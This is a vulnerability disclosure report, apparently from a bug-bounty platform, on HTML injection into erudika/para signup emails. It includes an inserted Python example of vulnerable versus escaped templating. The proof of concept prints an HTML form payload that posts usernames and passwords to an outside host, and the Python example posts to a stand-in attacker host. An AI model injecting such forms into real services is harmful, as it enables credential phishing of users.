Html Injection lead to cross site scripting in erudika/para

Valid

Reported on

May 14th 2022


Description

Hi, I found a way to inject HTML into a user's email. So in this case, if an attacker sets the name of the victim as an HTML form, it will be rendered by your system and then the rendered HTML will be sent to the victim.

Proof of Concept

  1. Go to https://paraio.com/signup/ and in the name field add this payload:

<form action="https://brutelogic.com.br/poc.svg/" method="post"> <label for="username">Username:</label> <input class="userbox" type="text" name="username"/><br /> <label for="password">Password:</label> <input type="text" name="password" > <input class="button" type="submit" value="submit" /> </form>

  2. Enter the victim's email and create a new account.
  3. Now go to the mail and check; you will see our code has been rendered as HTML.
  4. Submit the form and XSS.

// PoC.js var payload = ...

Impact

Cross-site scripting can be used to steal users' cookies, which will eventually lead to account takeover.
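The root cause the report describes is a display name interpolated verbatim into an HTML email. The following is an added illustration, not Para's code (Para is a Java project, and the fix in commit 9d844f is not shown on this page): a constructed template rendered once with the bug and once with context-appropriate escaping, plus a boundary check that flags tag-like names at signup.

```python
import html
import re

# Constructed stand-in for a signup confirmation template; Para's real template
# is not on the page. Only the {name} and {link} slots are user-influenced.
TEMPLATE = '<p>Hi {name}, welcome! Confirm your account: <a href="{link}">{link}</a></p>'

# Constructed display name in the spirit of the report's payload: an HTML form
# that a mail client would render inside the message body.
INJECTED_NAME = '<form action="https://attacker.invalid/" method="post"><input name="password"></form>'
CONFIRM_LINK = "https://example.invalid/confirm?token=abc123"  # constructed value


def render_email_vulnerable(name: str, link: str) -> str:
    """Interpolates the user-controlled name verbatim: the bug class in the report."""
    return TEMPLATE.format(name=name, link=link)


def render_email_fixed(name: str, link: str) -> str:
    """Escapes every untrusted value for the HTML context before interpolation.
    quote=True also encodes quote characters, so the value is safe inside
    attribute values as well as text nodes."""
    return TEMPLATE.format(name=html.escape(name, quote=True),
                           link=html.escape(link, quote=True))


# Matches the start of an HTML tag, closing tag, comment or processing instruction.
_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!?]")


def looks_like_markup(value: str) -> bool:
    """Defence in depth at the signup boundary: flag names containing tag-like
    sequences so they can be rejected or logged before reaching any template."""
    return bool(_TAG_RE.search(value))


def rendered_tags(body: str) -> int:
    """Counts tags in a rendered body. With escaping in place the count must equal
    the template's own tag count (p, a, /a, /p = 4) whatever name is supplied."""
    return len(_TAG_RE.findall(body))


if __name__ == "__main__":
    print(render_email_vulnerable(INJECTED_NAME, CONFIRM_LINK))
    print(render_email_fixed(INJECTED_NAME, CONFIRM_LINK))
```

The `rendered_tags` comparison is a useful regression test for any template that carries user data: the tag count of the output must not depend on the input.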

We are processing your report and will contact the erudika/para team within 24 hours. (a month ago)
Distorted_Hacker modified the report. (a month ago)
We have contacted a member of the erudika/para team and are waiting to hear back. (a month ago)
Alex Bogdanovski validated this vulnerability. (a month ago)
Distorted_Hacker has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Alex Bogdanovski confirmed that a fix has been merged on 9d844f. (a month ago)
Alex Bogdanovski has been awarded the fix bounty.
Distorted_Hacker
a month ago

Researcher


Hi @admin, can you please assign a CVE?

Jamie Slome
a month ago

Admin


Sorted 👍
